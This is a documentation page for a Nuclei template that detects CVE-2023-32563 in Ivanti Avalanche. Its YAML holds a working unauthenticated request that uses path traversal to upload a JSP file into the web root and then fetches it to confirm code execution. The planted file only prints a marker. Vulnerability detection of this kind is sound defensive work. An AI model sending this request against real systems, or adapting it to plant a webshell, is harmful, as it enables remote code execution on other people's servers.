Skip to content
Nuclei Templates

Ivanti Avalanche - Remote Code Execution

ID: CVE-2023-32563

Severity: critical

Author: princechaddha

Tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive

Description

Section titled “Description”

An unauthenticated attacker could achieve the code execution through a RemoteControl server.

YAML Source

Section titled “YAML Source”
id: CVE-2023-32563


info:
  name: Ivanti Avalanche - Remote Code Execution
  author: princechaddha
  severity: critical
  description: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability.
  reference:
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
    - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32563
    - https://github.com/mayur-esh/vuln-liners
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-32563
    cwe-id: CWE-22
    epss-score: 0.34709
    epss-percentile: 0.97105
    cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: avalanche
  tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive


http:
  - raw:
      - |
        POST /Servlet/Skins HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 333
        Content-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f
        Connection: close


        --------------------------eacf31f23ac1829f
        Content-Disposition: form-data; name="guid"


        ../../../Web/webapps/ROOT
        --------------------------eacf31f23ac1829f
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"


        <%
        out.println("CVE-2023-32563");
        %>
        --------------------------eacf31f23ac1829f--
      - |
        GET /{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2023-32563"
# digest: 4a0a0047304502204732bf938009c9282fd39e8ad8e5889954c26716026799fa0ad618f0d2fe8a0f022100cf5e632ca9bad7d2291231c1da2c75f5c094f2539a34beadcd3b2520251389bf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32563.yaml"

View on Github